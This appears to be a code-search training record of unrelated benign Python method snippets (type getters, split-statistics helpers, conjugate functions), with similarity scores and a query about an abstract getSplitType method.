"def convex_conj(self):\n return KullbackLeiblerCrossEntropy(self.domain, self.prior)",
"def convex_conj(self):\n if self.exponent == np.inf:\n return L1Norm(self.domain)\n elif self.exponent == 2:\n return L2Norm(self.domain)\n else:\n return LpNorm(self.domain, exponent=conj_exponent(self.exponent))",
"def coupons(self):\r\n return coup.Coupons(self)",
"def conj(z):",
"def adjoint(self):\n return self.conjugate().transpose()",
"def get_covariate_names(self):\n if self._population_model is None:\n return []\n\n return self._population_model.get_covariate_names()",
"def derived_series(self):\n res = [self]\n current = self\n nxt = self.derived_subgroup()\n while not current.is_subgroup(nxt):\n res.append(nxt)\n current = nxt\n nxt = nxt.derived_subgroup()\n return res",
"def complementary_regions(self):\n g = self._get_puncturefinder_graph()\n # return g.connected_components()\n return list(nx.connected_components(g))",
"def discriminant(self):\r\n return self.__b**2 - (4 * self.__a * self.__c)",
"def convex_conj(self):\n return ConstantFunctional(self.domain, -self.constant)",
"def conjugate(self):\n\n out = empty((self._size, *self.shape[1:]), self.dtype)\n\n if self.fragmented:\n k = self._capacity - self._begin # fragmentation index\n np.conjugate(self[self._begin:], out[:k])\n np.conjugate(self[:self._end], out[k:])\n else:\n if self._begin < self._end:\n part = self[self._begin:self._end]\n elif self._end == 0:\n part = self[self._begin:]\n\n np.conjugate(part, out)\n\n return(out)",
"def get_bases(self):\n # TODO: subclassing\n return (self.py_class,)",
"def complement(self):\n assert self._.d == 2, \"the complement is only defined for two classes\"\n return self._.complement",
"def cg(self):\n\n _cg = [0, 0, 0]\n _sumProduct = [0, 0, 0]\n _sumWeight = 0\n\n for fstnr in self:\n # Calculate the sum of the products\n for i, component in enumerate(fstnr.xyz):\n _sumProduct[i] += component * fstnr.wt\n\n # Calculate the sum of the areas\n _sumWeight += fstnr.wt\n\n # Divide sum of products by sum of areas\n for i, product in enumerate(_sumProduct):\n _cg[i] = product / _sumWeight\n\n return _cg",
"def convex_conj(self):\n return NuclearNorm(self.domain,\n conj_exponent(self.__norm.outernorm.exponent),\n conj_exponent(self.__norm.pwisenorm.exponent))",
"def conj(self):\n \n Out = self._CreateSameType()\n \n for Ind in self.IndList():\n OutInd = tuple(-x for x in Ind)\n \n Out[OutInd]=self[Ind].conj().T\n \n return Out",
"def calc_chromatic_coupling(self):\n raise NotImplementedError('Chromatic Coupling is not Implemented yet.')",
"def convex_conj(self):\n conj_exp = conj_exponent(self.pointwise_norm.exponent)\n return IndicatorGroupL1UnitBall(self.domain, exponent=conj_exp)",
"def gt_bases(self):\n result = []\n for a in self.gt_alleles:\n if a is None:\n result.append(None)\n elif a == 0:\n result.append(self.site.REF)\n else:\n result.append(self.site.ALT[a - 1].value)\n return tuple(result)",
"def channels(self): # type: (...) -> List[BlendingRangePair]\n return self._channels",
"def extra_super_categories(self):\n return [self.base_category()]",
"def base_codes(self):\n bases = []\n\n if self.is_gas_giant:\n bases.append(\"G\")\n if self.is_naval_base:\n bases.append(\"N\")\n if self.is_scout_base:\n bases.append(\"S\")\n if self.is_research_base:\n bases.append(\"R\")\n if self.is_tas:\n bases.append(\"T\")\n if self.is_consulate:\n bases.append(\"I\")\n if self.is_pirate_base:\n bases.append(\"P\")\n\n return \" \".join(bases)",
"def covariates(self) -> List[str]:\n return self._obj._names[\"covariates\"]"
] | [
"0.6720197",
"0.64957684",
"0.63367724",
"0.6140327",
"0.6048907",
"0.6023874",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5865215",
"0.5845415",
"0.5821366",
"0.5820317",
"0.5815315",
"0.5783399",
"0.57787544",
"0.5774332",
"0.5772097",
"0.5763859",
"0.5679504",
"0.56636083",
"0.56427765",
"0.55517787",
"0.552264",
"0.5508906",
"0.5462666",
"0.5454695",
"0.5432398",
"0.5422469",
"0.5417685",
"0.54102105",
"0.5408107",
"0.5319588",
"0.5306486",
"0.5289657",
"0.5287049",
"0.5285946",
"0.5275198",
"0.52497894",
"0.5241084",
"0.52278465",
"0.5226252",
"0.52234095",
"0.5219807",
"0.52161777",
"0.52050656",
"0.5199222",
"0.5189515",
"0.51849216",
"0.5183616",
"0.5154867",
"0.5140653",
"0.51309776",
"0.5122071",
"0.511917",
"0.5097439",
"0.5080047",
"0.50778675",
"0.5071287",
"0.5066524",
"0.5065067",
"0.50609446",
"0.50574934",
"0.50412816",
"0.5041148",
"0.5029396",
"0.5028577",
"0.5025304",
"0.50053304",
"0.49896324",
"0.4988791",
"0.49720556",
"0.49658927",
"0.49554482",
"0.495241",
"0.49504754",
"0.49443868",
"0.49440613",
"0.49249414",
"0.4916333",
"0.49110147",
"0.48991126",
"0.4898391",
"0.48895624",
"0.48802876",
"0.48796725",
"0.4876867"
] | 0.6723077 | 0 |
Returns the objects, relations and/or attributes type used by this distinction, it must be overridden. | def getReferencedTypes(self):
raise AbstractMethodException(self.__class__) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def type(self):\n pass",
"def type(self):\n pass",
"def type(self):\n pass",
"def Type(self):\r\n\t\treturn self._get_attribute('type')",
"def type(self):\n\t\treturn self.type_",
"def target_type(self):",
"def get_metacls(self):\n return type",
"def type(self):\r\n return self.__type",
"def object_type(self):\n return self._object_type",
"def object_type(self):\n return self._object_type",
"def object_type(self):\n return self._object_type",
"def object_type(self):\n return self._object_type",
"def object_type(self):\n return self._object_type",
"def object_type(self) -> str:\n return self._object_type",
"def type(self):\n return self.__type",
"def _reltype(self):\n return self.__reltype",
"def getDistType(self):\n return self.distType",
"def get_model_type(self):\n pass",
"def __repr__(self):\r\n return self.get_distribution_type()",
"def get_type(self, ):\n return self.attrs.get(self.AttributeNames.TYPE, None)",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def type(self):\n return None",
"def getType(self,):\n\t\treturn self.type;",
"def return_weightType(self):\n return self.__type",
"def use_types( self ) :\n return self._use_types",
"def get_type(self):\r\n return self.mm_type + self.meta_model.get_type()",
"def etypes(self): # -> list[None]:\n ...",
"def get_type(self):\n return self.__animal_type",
"def get_optypelist (self):\n return self.optypelist",
"def type_(self):\n return self._type",
"def get_type ( self, object ):\n return self.type",
"def get_type ( self, object ):\n return self.type",
"def getType(self):\n return self.type",
"def model_type(self):\n return self._model_type",
"def informationtype(self):\n return self._informationtype",
"def etypes(self): # -> list[str]:\n ...",
"def product_type(self):\r\n return self.__class__.__name__",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def _type(self):\n return self._id[1]",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type"
] | [
"0.65846187",
"0.65846187",
"0.65846187",
"0.6552763",
"0.6550641",
"0.64525676",
"0.6426711",
"0.6419668",
"0.64058083",
"0.64058083",
"0.64058083",
"0.64058083",
"0.64058083",
"0.63964784",
"0.6383223",
"0.6366031",
"0.63618296",
"0.6343517",
"0.6325977",
"0.6325582",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.6251357",
"0.62455416",
"0.6231721",
"0.62281203",
"0.6191322",
"0.61881167",
"0.6185353",
"0.6175413",
"0.6150113",
"0.6147402",
"0.6147402",
"0.613753",
"0.61338556",
"0.6130929",
"0.612989",
"0.6120876",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.6113483",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381"
] | 0.0 | -1 |
Returns a tuple of information about the split, such as the stat function for AttributeDistinction. The first should be a plain English name of the distinction, other elements are distinction dependent. | def getSplitType(self):
raise AbstractMethodException(self.__class__) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def getsplitinfo():\n \n splitvarlist = spss.GetSplitVariableNames()\n if len(splitvarlist) == 0:\n return [], None\n else:\n splittype = spssaux.getShow(\"split\", olang=\"english\")\n if splittype.lower().startswith(\"layer\"):\n splittype=\"layered\"\n else:\n splittype=\"separate\"\n return splitvarlist, splittype",
"def getSplit(self):\n b_index, b_value, b_score, b_groups = 999, 999, 999, None\n for j in range(len(self[0]) - 1):\n for i in range(len(self)):\n groups = self.splitAttribute(j, self[i][j]) # lit, big\n gini = self.giniIndex(groups)\n if gini < b_score and (j, \"%.1f\" % self[i][j]) not in self.atr:\n b_index, b_value, b_score, b_groups = j, self[i][\n j], gini, groups\n return b_index, b_value, b_groups, b_score",
"def splitmetric(self, dataset, attr, target_attr):\n freq = {}\n splitinfo = 0.0\n \n #Call information gain\n gain = ID3.splitmetric(self, dataset, attr, target_attr);\n samplenumbers = len(dataset)\n # Calculate the frequency of each of the values in the split attribute\n for record in dataset:\n if (record[attr] in freq):\n freq[record[attr]] += 1.0\n else:\n freq[record[attr]] = 1.0\n \n #Calculate split info, entropy of splitter\n for val in list(freq.values()):\n splitinfo += (- val / samplenumbers) * math.log(val / samplenumbers, 2)\n \n #Split info equals 0 when there only one class in data set\n if splitinfo == 0:\n splitinfo = 0.00000001\n \n return gain / splitinfo",
"def split_comp_info(self, catalog_name, split_ver, split_key):\n return self._split_comp_info_dicts[\"%s_%s\" % (catalog_name, split_ver)][split_key]",
"def _print_split_infos(self, node, left, right, left_to_split):\n DEBUG_info = \"#DEBUG n_clusters={n_clusters:04d} to_split={to_split:04d}\"\n infos = dict(n_clusters=self.n_clusters, to_split=left_to_split)\n DEBUG_info += \" score={score}\"\n infos['score'] = _ps(node.score)\n if node.has_children:\n # node was split\n DEBUG_info += \" vec={vec:04d} sl={sl} nl={nl:06d} sr={sr} nr={nr:06d}\"\n infos['vec'] = left.vec\n infos['sl'] = _ps(left.score)\n infos['nl'] = left.size\n infos['sr'] = _ps(right.score)\n infos['nr'] = right.size\n else:\n # node is a leaf\n DEBUG_info += \" LEAF\" + ' ' * 42\n DEBUG_info += \" size={size:06d} path={path}\"\n infos['size'] = node.size\n infos['path'] = node.name\n print DEBUG_info.format(**infos)\n sys.stdout.flush()",
"def get_bnd_info(self):\n nbor = self.nbor\n lihbor, liubor, livbor, _, _, _, _, \\\n litbor, _, _, _, _ = self.bnd_info\n\n return (nbor, lihbor, liubor, livbor, litbor)",
"def get_info_in_tuple(self):\r\n return self.key, self.value, self.get_color(), self.size_tree",
"def split(self):\n return self._clip_metadata.get(\"split\")",
"def splitAttribute(self, atr, divider=0.5):\n big, lit = DecisionTree(None, self.atr), DecisionTree(None, self.atr)\n for d in self:\n if d[atr] > divider: big.append(d)\n else: lit.append(d)\n return lit, big",
"def best_split(self):\n sub_group = []\n\n current_entropy = self.entropy(self._Passengers)\n best_gain = 0 # holds the best entropy difference so far\n best_split = self._Attr[0].get_name()\n relative_entropy = 0 # entropy while taking account for the size of the population\n\n for Attribute in self._Attr:\n relative_entropy = 0\n print(\"Attr considered: \" + Attribute.get_name())\n for Attr_option in Attribute.get_options():\n sub_group = []\n for Passenger in self._Passengers:\n if self.passenger_attr_option_check(Passenger,\n Attribute.get_name(),\n Attr_option): # if P.A = V\n sub_group.append(Passenger)\n if len(sub_group) > 0 and len(self._Passengers) > 0:\n relative_entropy += self.entropy(sub_group) * (len(sub_group)/len(self._Passengers))\n\n if current_entropy - relative_entropy > best_gain:\n best_gain = current_entropy - relative_entropy\n best_split = Attribute.get_name()\n\n print(f\"best split:{best_split} \\n with entropy gain of:\\n {best_gain}\")\n\n return best_split",
"def info(self):\n return (self.kind, self.value)",
"def getSplitAttr(self, data, attributes):\n splitAttrIndex = 0\n lengthAttr = len(attributes)\n del self.infoGain[:]\n index = 0\n while index < lengthAttr:\n self.infoGain.append(self.getInfoGain(data, index))\n index += 1\n\n for gain in self.infoGain:\n if gain == max(self.infoGain):\n break\n splitAttrIndex += 1\n return splitAttrIndex",
"def getSplitFunc(self, splitType):\n if splitType.upper() == \"INFO GAIN\":\n return self.findBestColumnSplitByInfoGain\n elif splitType.upper() == \"GAIN RATIO\":\n return self.findBestColumnSplitByGainRatio\n elif splitType.upper() == \"GINI INDEX\":\n return self.findBestColumnSplitByGini\n return None",
"def best_split(self, X, y, attributes):\n if (self.criterion==\"information_gain\"):\n global_if = float('-inf') # the highest value of information gain/gini gain seen so far\n attr = None\n for attribute in attributes:\n attr_val = X[attribute].copy()\n cur_if = information_gain(y,attr_val,self.type)\n if (cur_if>global_if):\n # Update when a better split is receieved\n global_if = cur_if\n attr = attribute\n return attr\n else:\n global_if = float('inf')\n attr = None\n for attribute in attributes:\n attr_val = X[attribute].copy()\n cur_if = gini_gain(y,attr_val)\n if (global_if>cur_if):\n # Update when a better split is receieved\n global_if = cur_if\n attr = attribute\n return attr",
"def _get_spans(self, span_info_parts: List[str]) -> List[Tuple[int, int, int]]:\n result_spans = []\n\n for p in span_info_parts:\n if p == \"\":\n break\n c, start, end = p.split(\" \")\n if c not in self._semiotic_classes:\n raise KeyError(\"class=\" + c + \" not found in self._semiotic_classes\")\n cid = self._semiotic_classes[c]\n # +1 because this should be indexing on input_ids which has [CLS] token at beginning\n start = int(start) + 1\n end = int(end) + 1\n result_spans.append((cid, start, end))\n return result_spans",
"def get_version_info() -> Tuple[Text, Text]:",
"def split_on_feat(artist):\n # split on the first \"feat\".\n regex = re.compile(plugins.feat_tokens(), re.IGNORECASE)\n parts = [s.strip() for s in regex.split(artist, 1)]\n if len(parts) == 1:\n return parts[0], None\n else:\n return tuple(parts)",
"def get_data_tuple_names(self):\n return (('test_number',))",
"def parse_step_info(self, step: str) -> Tuple[str]:\n step_info = re.findall(r'\\[[^\\[\\]]+\\]', step)[0][1:-1].split('/')\n return step_info[0], step_info[1]",
"def _named_attrs(self, parts:dict) -> \\\n (QA4SMNamedAttributes, list, QA4SMNamedAttributes):\n\n if not self.ismetr():\n raise IOError(self.varname, '{} is not in form of a QA4SM metric variable.')\n\n if self.g == 0:\n a = QA4SMAttributes(self.attrs)\n ref_ds = QA4SMNamedAttributes(a.ref_dc - a._offset_id_dc,\n a.get_ref_names()['short_name'], self.attrs)\n return ref_ds, None, None\n else:\n dss = []\n ref_ds = QA4SMNamedAttributes(parts['ref_id'], parts['ref_ds'], self.attrs)\n ds = QA4SMNamedAttributes(parts['sat_id0'], parts['sat_ds0'], self.attrs)\n dss.append(ds)\n if self.g == 3:\n ds = QA4SMNamedAttributes(parts['sat_id1'], parts['sat_ds1'], self.attrs)\n dss.append(ds)\n mds = QA4SMNamedAttributes(parts['mds_id'], parts['mds'], self.attrs)\n else:\n mds = None\n return ref_ds, dss, mds",
"def split_comp_info_dict(self, catalog_name, split_ver):\n return self._split_comp_info_dicts[\"%s_%s\" % (catalog_name, split_ver)]",
"def get_splits(self) -> Dict[str, np.array]:\n\n return self.splits",
"def values(self):\n\t\treturn tuple(self.dist.values())",
"def get_attributes(self):\n attrs = list()\n syms = list()\n for item in self.gradual_items:\n gi = item.as_integer()\n attrs.append(gi[0])\n syms.append(gi[1])\n return attrs, syms",
"def items(self):\n\t\treturn tuple(self.dist.items())",
"def getSentenceInfo(sentence):\n\tpass",
"def GetCLInfo(cl_info_str):\n return cl_info_str.split('/')",
"def get_sp_info(self, brawler_name: str, sp: str):\n\n for brawler in self.BRAWLERS:\n if brawler == brawler_name:\n sp_name = self.BRAWLERS[brawler][sp]['name']\n sp_ind = int(sp[2]) - 1\n sp_icon = sp_icons[brawler][sp_ind]\n\n return sp_name, sp_icon",
"def split(self):\n return self.dataset_split",
"def __getConcepts(self, split):\n umls_cui = split[0].strip()\n language = split[1].strip()\n kb = split[11].strip()\n term_type = split[12].strip()\n kb_cui = split[13].strip()\n kb_name = split[14].strip()\n return umls_cui, language, kb, term_type, kb_cui, kb_name",
"def getSplitDetectorSignal(self):\r\n\t\treturn self.splitData",
"def split (l):\n segs = l.strip().split ('\\t')\n label = segs [-1]\n words = segs [:-1]\n return words, label",
"def find_split(data):\n ret = {\"router\": None, \"split_point\": None, \"entropy\": get_entropy(data[:, 7])}\n\n # Create array of unique datapoints\n split_points_list = list()\n\n for i in range(data.shape[1] - 1):\n unique_signal = np.unique(data[:, i])\n split_points = list()\n for j in range(len(unique_signal) - 1):\n split_points.append((unique_signal[j]+unique_signal[j+1])/2)\n split_points_list.append(split_points)\n\n # Split data by split points and calculate entropy\n for feature in range(len(split_points_list)):\n for i in range(len(split_points_list[feature])):\n data_l, data_r = split_data(data, feature + 1, split_points_list[feature][i])\n entropy = get_entropy(data_l[:, 7], data_r[:, 7])\n if entropy < ret[\"entropy\"]:\n ret[\"entropy\"] = entropy\n ret[\"router\"] = feature + 1\n ret[\"split_point\"] = split_points_list[feature][i]\n\n return ret[\"router\"], ret[\"split_point\"], split_data(data, ret[\"router\"], ret[\"split_point\"])",
"def getInfo():",
"def getPairStats(): \r\n\r\n #calculcate remainder of equations\r\n s_xx = x_sum_square - (1/n)*(x_sum**2)\r\n s_yy = y_sum_square - (1/n)*(y_sum**2)\r\n s_xy = xy_sum - (1/n)*x_sum*y_sum\r\n \r\n return s_xx, s_yy, s_xy",
"def info(self):\n version_str = self.version\n return Utils.version_str2tuple(version_str)",
"def getStati(self):\n raise \"not implemented\"",
"def __to_tuple(self):\n return (self.bucket, self.name)",
"def parse(self):\n # type: () -> Tuple[LineNo, int, LineNo, int]\n metadata = self.safely_parse_metadata()\n if len(metadata) > 2:\n raise UnsupportedCombinedDiff(self.text)\n assert len(metadata) == 2\n return tuple(flatten(metadata)) # type: ignore[return-value]",
"def get_split(self,X,y):\n \n BEST_COL = 0\n BEST_SPLIT =0\n BEST_IMPUR = 99\n for i,feature in enumerate(X.T):\n arg_sort=np.argsort(feature) #Sort the feature for optimizing the find of splitting points\n feature= feature[arg_sort]\n y_sort = y[arg_sort]\n splits = self.possible_splits(feature,y_sort) #Get \n\n impur,splits = self.test_split(feature,y_sort,splits) #Get impurity for splitting points\n best_idx = np.argmin(impur)\n best_impur = impur[best_idx]\n \n if best_impur==0.0: #Found perfect split, terminate\n return(i,splits[best_idx])\n elif best_impur<BEST_IMPUR:\n BEST_IMPUR=best_impur\n BEST_SPLIT=splits[best_idx]\n BEST_COL=i\n return (BEST_COL,BEST_SPLIT)",
"def extract_info(self, docstring):\n pass",
"def info(self):\n return (self._title, self._version, self._descr)",
"def _get_dirname_information(self,\n dirname=None,\n config=\"\",\n grisim=\"\",\n grism_extinfo=None,\n dir_hdu=None):\n # check whether ANY direct image information exists\n if ((dirname is None) and (dir_hdu is None)):\n # set the grism image as direct image\n dirname = grisim\n dirname_extinfo = grism_extinfo\n\n elif ((dirname is not None) and (dir_hdu is None)):\n # load the configuration file;\n # determine the extension information\n conf = configfile.ConfigFile(getCONF(config))\n dirname_extinfo = get_ext_info(getDATA(grisim), conf)\n del conf\n\n elif ((dirname is not None) and (dir_hdu is not None)):\n # make by hand the extension information\n dirname_extinfo = {'axe_ext': dir_hdu, 'fits_ext': dir_hdu-1}\n\n else:\n # error and out\n err_msg = (\"Specifying NO direct image but a direct image HDU: \"\n \"{0:d} makrs NO sense!\".format(dir_hdu))\n raise aXeError(err_msg)\n\n # return the name and the extension info\n return dirname, dirname_extinfo",
"def _get_splitpoints_class_to_subclasses(self, l_adj_discr):\n std = numpy.std(l_adj_discr)\n return [i for i, discr in enumerate(l_adj_discr) if discr >= std * self.std_split]",
"def split(test_name):\n recipe, simple_test_name = test_name.split('.', 1)\n return recipe, simple_test_name",
"def split(pairs, dev_ratio):\n dev, test = [], []\n for p in pairs:\n if random.random() < dev_ratio:\n dev.append(p)\n else:\n test.append(p)\n\n return dev, test",
"def retrieve_step_info(self, observation):\n\n beacon_next, marine_next, self.distance_next = \\\n self.calc_distance(observation)\n\n obs, reward, done, info = super(Move2Beacon, self).retrieve_step_info(observation)\n\n self.distance = self.distance_next\n self.marine_center = marine_next\n self.beacon_center = beacon_next\n\n STATE = 0\n FIRST = 1\n LAST = 2\n PYSC2_SCORE = 3\n PYSC2_REWARD = 4\n AVAILABLE_ACTIONS = 5\n\n obs_mv2beacon = [obs[STATE],\n obs[FIRST],\n obs[LAST],\n obs[PYSC2_SCORE],\n obs[PYSC2_REWARD],\n obs[AVAILABLE_ACTIONS],\n self.distance,\n self.marine_center,\n self.beacon_center]\n\n return obs_mv2beacon, reward, done, info",
"def get_splits(self):\n\t\treturn self.k",
"def show_info(self):\n # attr[0] attr[1]\n attrs = [(self.TYP.value, 'nam'),\n ('Skill', 'skl')]\n # voeg ook alle stats en skills in deze lijst toe.\n for stat in Minimals:\n attrs.append((stat.value, stat.name))\n attrs.append(('Spell Battery', 'cur_bat'))\n for stat in StatType:\n attrs.append((stat.value, stat.name))\n for skill in SkillType:\n attrs.append((skill.value, skill.name))\n\n # nu alle mogelijkheden geladen zijn, ga dan aan de slag met diegene die van toepassing zijn\n attr_list = []\n\n import enum\n for attr in attrs:\n value_of_attr = self.get_value_of(attr[1])\n # uitzondering, 'wht' altijd gewoon weergeven\n if attr[0] == StatType.wht.value:\n # deze uitzondering geldt niet voor weapons en shields.\n if not isinstance(self.get_value_of('skl'), enum.Enum): # niet wanneer 'skl' een waarde heeft\n attr_list.append((attr[0], str(value_of_attr)))\n elif value_of_attr:\n if isinstance(value_of_attr, enum.Enum): # uitzondering alleen voor 'skl'\n value_of_attr = value_of_attr.value\n elif attr[0] == StatType.hit.value: # uitzondering alleen voor 'hit'\n value_of_attr = str(value_of_attr)+\"%\"\n attr_list.append((attr[0], str(value_of_attr)))\n\n return attr_list",
"def getPair(self, args):\r\n return self.name, self.getValue(args)",
"def unpack(self) -> Tuple[list, list, list, list, float, int, list]:\n # (nice to have) todo:refactor --> as a namedtuple\n unpacked_super = super().unpack()\n\n observations, actions, rewards, Q_values, trajectory_return, _trajectory_lenght = unpacked_super\n\n return observations, actions, rewards, Q_values, trajectory_return, _trajectory_lenght, self.V_estimates",
"def args(self):\n return (self._differences, self._description)",
"def get_statistics(self):\n\n return (self.func_id, self.instruction_count)",
"def _getSeparationWeightingForBlob(self, dataBlob):\n return self._separationWeighting_Random.valueForIntegerId(dataBlob.agentId)",
"def debug_info(self) -> t.List[t.Tuple[int, int]]:\n if self._debug_info:\n return [\n tuple(map(int, x.split(\"=\"))) # type: ignore\n for x in self._debug_info.split(\"&\")\n ]\n\n return []",
"def version_info():\r\n return tuple(map(int, __version__.split('.')))",
"def split_file(document: str):\n class_name, sep, assignment_name = document.partition(\"-\")\n try:\n assignment_name = assignment_name.split('.')[0].split('_')[0]\n except TypeError:\n pass\n return class_name, assignment_name",
"def best_split1(self,X,attributes):\n if (self.criterion==\"information_gain\"):\n global_if = float('-inf') # the highest value of varience seen so far\n attr , val = None, None\n for attribute in attributes[::-1]:\n attr_val = pd.Series(X[attribute].unique()).sort_values(ignore_index=True)\n last_val = attr_val[0]\n for i in range(1,attr_val.size):\n cur_val = attr_val[i]\n valc = round((last_val+cur_val)/2,4)\n last_val = cur_val\n cur_if = information_gain1(valc,X[attribute],X[\"Output\"],self.type)\n if (cur_if>global_if):\n global_if,attr,val = cur_if,attribute,valc\n return attr,val\n else:\n global_if = float('inf') # the lowest value of varience seen so far\n attr , val = None, None\n for attribute in attributes[::-1]:\n attr_val = pd.Series(X[attribute].unique()).sort_values(ignore_index=True)\n last_val = attr_val[0]\n for i in range(1,attr_val.size):\n cur_val = attr_val[i]\n valc = round((last_val+cur_val)/2,4)\n last_val = cur_val\n cur_if = gini_gain1(X[\"Output\"],X[attribute], valc)\n if (global_if>cur_if):\n global_if,attr,val = cur_if,attribute,valc\n return attr,val",
"def info(self) -> list[int]:",
"def _splitName(self, name):\n # splitting up the name\n try:\n arr = name.split(self.__dividerName__)\n except ValueError as err:\n logging.exception('Error processing annotation name: {}'.format(str(err)))\n logging.exception('Could not split name with divider {} from {}'.format(self.__dividerName__,name))\n\n if len(arr)!= self._nameColCount:\n raise ValueError(\"Malformed name entry '{}'. There must be {} fields separated by {}\".format(name,self._nameColCount,self.__dividerName__))\n \n geneID = arr[self.__indexGeneID__]\n geneSymbol = arr[self.__indexGeneSymbol__]\n UID = arr[self.__indexUID__]\n geneType = arr[self.__indexGeneType__]\n geneRegion = arr[self.__indexGeneRegion__]\n \n try:\n (genePositionNumber, genePositionTotal) = arr[self.__indexRegionPos__].split(self.__dividerRegion__)\n except ValueError as err:\n logging.exception('Error processing annotation name: {}'.format(str(err)))\n logging.exception('Could not split value with index {} with divider {} from {}'.format(self.__indexRegionPos__, \n self.__dividerRegion__,\n arr))\n \n # # empty string if not windowed. \n # annotationWindowNumber = windowNumber.zfill(self.__zeroFillWindow__) if isWindowed else \"\"\n # annotationWindowSeparator = \"W\" if isWindowed else \"\"\n \n if self._isWindowed:\n windowNumber = arr[self.__indexWindowNumber__]\n return (UID, geneID, geneSymbol, geneType, geneRegion, genePositionNumber, genePositionTotal, windowNumber)\n else:\n return (UID, geneID, geneSymbol, geneType, geneRegion, genePositionNumber, genePositionTotal)",
"def _split_name(name):\n name_split = name.split('_view_')\n view_num = None\n if(len(name_split) > 1):\n view_num = int(name_split[1])\n optimizer_key = ''\n fp16_key = ''\n if name_split[0].startswith('Moment_1'):\n optimizer_key = 'Moment_1_'\n elif name_split[0].startswith('Moment_2'):\n optimizer_key = 'Moment_2_'\n elif name_split[0].startswith('Update_Count'):\n optimizer_key = 'Update_Count_'\n elif name_split[0].endswith('_fp16'):\n fp16_key = '_fp16'\n param_name = name_split[0]\n if optimizer_key != '':\n param_name = param_name.split(optimizer_key)[1]\n param_name = param_name.split('_fp16')[0]\n return param_name, optimizer_key, view_num, fp16_key",
"def filenameSplit (p):\n\tfrom os.path import split as splitPath, splitdrive, splitext\n\t\n\tsplt = splitPath (p)\n\tdisk,dir_ = splitdrive(splt[0])\n\ttry:\n\t\tif disk[1] != \":\":\n\t\t\traise IndexError\n\texcept IndexError:\n\t\tdisk,dir_ = \"\", splt[0]\n\tname,ext = splitext(splt[1])\n\treturn disk,dir_,name,ext",
"def get_comp_spanrels(self):",
"def getInfoVariableNames(self, product):\r\n return []",
"def _genome_info_tuple(self, name, size=False):\n accession = self.assembly_accession(name)\n taxid = self.genome_taxid(name)\n annotations = bool(self.annotation_links(name))\n species = self.genomes[name].get(\"scientific_name\")\n other = self.genomes[name].get(\"genebuild\")\n if size:\n length = self.genomes[name][\"base_count\"]\n return name, accession, taxid, annotations, species, length, other\n return name, accession, taxid, annotations, species, other",
